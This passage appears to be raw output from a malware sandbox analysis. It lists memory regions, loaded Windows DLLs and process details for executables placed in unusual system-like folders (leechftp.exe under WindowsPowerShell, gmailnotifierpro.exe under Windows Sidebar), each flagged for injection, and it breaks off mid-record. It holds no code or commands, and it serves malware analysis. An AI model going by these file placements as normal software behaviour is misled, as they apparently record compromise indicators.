= mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2342 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2343 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 2344 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 2345 start_va = 0x930000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 2346 start_va = 0xac0000 end_va = 0xb7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 2347 start_va = 0xb90000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2348 start_va = 0xc90000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 2349 start_va = 0x1390000 end_va = 0x13a6fff monitored = 0 entry_point = 0x13914a1 region_type = mapped_file name = "ncftp.exe" filename = "\\Program Files (x86)\\Microsoft.NET\\ncftp.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\ncftp.exe") Region: id = 2350 start_va = 0x13b0000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 2351 start_va = 0x27b0000 end_va = 0x3173fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027b0000" filename = "" Region: id = 2352 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2353 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2354 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2355 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2356 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2357 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2358 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2359 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2360 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2361 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2362 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2363 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2364 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2365 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2366 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2367 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2368 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2369 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2370 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2371 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2372 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2373 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2374 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2375 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2376 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2377 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2379 start_va = 0x4e0000 end_va = 0x5d8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Thread: id = 122 os_tid = 0x1188 Process: id = "24" image_name = "leechftp.exe" filename = "c:\\program files (x86)\\windowspowershell\\leechftp.exe" page_root = "0x5fc27000" os_pid = "0x118c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\leechftp.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2381 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2382 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2383 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2384 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2385 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2386 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2387 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2388 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2389 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2390 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2391 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2392 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2393 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2394 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2395 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 2396 start_va = 0x6c0000 end_va = 0x77bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 2397 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 2398 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2399 start_va = 0xa40000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2400 start_va = 0xc60000 end_va = 0xc76fff monitored = 0 entry_point = 0xc614a1 region_type = mapped_file name = "leechftp.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\leechftp.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\leechftp.exe") Region: id = 2401 start_va = 0xc80000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c80000" filename = "" Region: id = 2402 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 2403 start_va = 0x2210000 end_va = 0x2bd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002210000" filename = "" Region: id = 2404 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2405 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2406 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2407 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2408 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2409 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2410 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2411 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2412 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2413 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2414 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2415 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2416 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2417 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2418 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2419 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2420 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2421 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2422 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2423 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2424 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2425 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2426 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2427 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2428 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2429 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2431 start_va = 0x2080000 end_va = 0x21e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002080000" filename = "" Thread: id = 123 os_tid = 0x1190 Process: id = "25" image_name = "gmailnotifierpro.exe" filename = "c:\\program files\\windows sidebar\\gmailnotifierpro.exe" page_root = "0x5e931000" os_pid = "0x11ac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Sidebar\\gmailnotifierpro.exe\" " cur_dir = "C:\\Program Files\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2432 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2433 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2434 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2435 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2436 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2437 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2438 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2439 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2440 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2441 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2442 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2443 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2444 start_va = 0x450000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2445 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2446 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2447 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2448 start_va = 0x750000 end_va = 0x8d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2449 start_va = 0x8e0000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2450 start_va = 0xa70000 end_va = 0xb2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 2451 start_va = 0xba0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2452 start_va = 0xea0000 end_va = 0xeb6fff monitored = 0 entry_point = 0xea14a1 region_type = mapped_file name = "gmailnotifierpro.exe" filename = "\\Program Files\\Windows Sidebar\\gmailnotifierpro.exe" (normalized: "c:\\program files\\windows sidebar\\gmailnotifierpro.exe") Region: id = 2453 start_va = 0xec0000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ec0000" filename = "" Region: id = 2454 start_va = 0x22c0000 end_va = 0x2c83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022c0000" filename = "" Region: id = 2455 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2456 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2457 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2458 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2459 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2460 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2461 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2462 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2463 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2464 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2465 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2466 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2467 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2468 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2469 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2470 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2471 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2472 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2473 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2474 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2475 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2476 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2477 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2478 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id 